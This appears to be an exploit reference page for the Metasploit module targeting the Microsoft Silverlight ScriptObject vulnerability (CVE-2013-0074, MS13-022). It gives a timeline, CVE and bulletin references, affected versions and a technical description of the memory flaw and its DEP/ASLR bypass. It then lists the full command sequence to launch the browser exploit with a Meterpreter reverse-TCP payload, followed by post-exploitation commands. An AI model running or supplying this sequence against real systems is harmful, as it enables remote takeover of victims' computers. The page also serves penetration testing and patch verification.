Timeline :

Vulnerability discovered by James Forshaw
Patched by the vendor the 2013-03-12
PoC provided by Vitaliy Toropov the 2013-10-23
Discovered exploited into Exploit Kits the 2013-11-13
Metasploit PoC provided the 2013-11-22

PoC provided by :

James Forshaw
Vitaliy Toropov
juan vazquez

Reference(s) :

CVE-2013-0074
CVE-2013-3896
OSVDB-91147
OSVDB-98223
BID-58327
BID-62793
MS13-022
MS13-087

Affected version(s) :

All versions of Microsoft Silverlight 5 bellow version 5.1.20125.0

Tested on :

Windows 7 SP1 with Microsoft Silverlight version 5.1.20125.0

Description :

This module exploits a vulnerability in Microsoft Silverlight. The vulnerability exists on the Initialize() method from System.Windows.Browser.ScriptObject, which access memory in an unsafe manner. Since it is accessible for untrusted code (user controlled) it’s possible to dereference arbitrary memory which easily leverages to arbitrary code execution. In order to bypass DEP/ASLR a second vulnerability is used, in the public WriteableBitmap class from System.Windows.dll. This module has been tested successfully on IE6 – IE10, Windows XP SP3 / Windows 7 SP1.

Commands :

use exploit/windows/browser/ms13_022_silverlight_script_object
set SRVHOST 192.168.6.138
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.6.138
exploit

sysinfo
getuid